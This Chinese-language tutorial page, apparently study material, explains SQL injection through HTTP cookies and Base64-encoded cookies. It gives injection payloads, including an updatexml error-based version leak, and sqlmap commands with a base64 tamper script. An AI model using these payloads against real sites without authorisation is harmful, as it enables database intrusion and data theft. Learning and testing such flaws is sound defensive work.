💎一站式轻松地调用各大LLM模型接口,支持GPT4、智谱、星火、月之暗面及文生图 广告
![](https://img.kancloud.cn/41/e0/41e066af9a6c25a24868d9667253ec98_1241x333.jpg) ***** ## cookie注入 ### HTTP头中的注入介绍 服务器可以利用cookies包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传 输中的状态。cookies最经典的应用就是判断用户是否已经登录网站。 ### cookie注入 代码中使用Cookie传递参数,但是没有对Cookie中传递的参数进行过滤操作。导致SQL注入漏洞的产生。 注入的payload ``` Cookie: uname=admin' or 1=1 --+ Cookie: uname=admin' and updatexml(1,concat(0x7e,version(),0x7e),1) --+ ``` ### sqlmap安全测试 ``` sqlmap -r target.txt --level 3 --batch ``` ## cookie Base64注入 ### Base64介绍 base64编码是从二进制到字符的过程,可用于在HTTP环境下传递较长的标识信息。base64是 网络上最常见的用于传输8Bit字节码的编码方式之一,base64就是一种基于64个可打印字符 来表示二进制数据的方法 将原始内容转换为二进制,从左到右依次取6位,然后在最高补两位0,形成新的内容 <br>编码规则 - 1.把3个字符变成4个字符 - 2.每76个字符加一个换行符 - 3.最后的结束符也要处理 ### cookie Base64注入代码分析 base64加密网址:http://tool.oschina.net/encrypt?type=3 如果报出Warning: date(): 在php.ini中设置date.timezone的值为PRC,设置好以后的为:date.timezone=PRC 使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。 明文 " or 1=1 # ``` IiBvciAxPTEgIw== ``` ### sqlmap安全检测 ``` python sqlmap.py -r target.txt --level 3 --tamper base64encode.py ```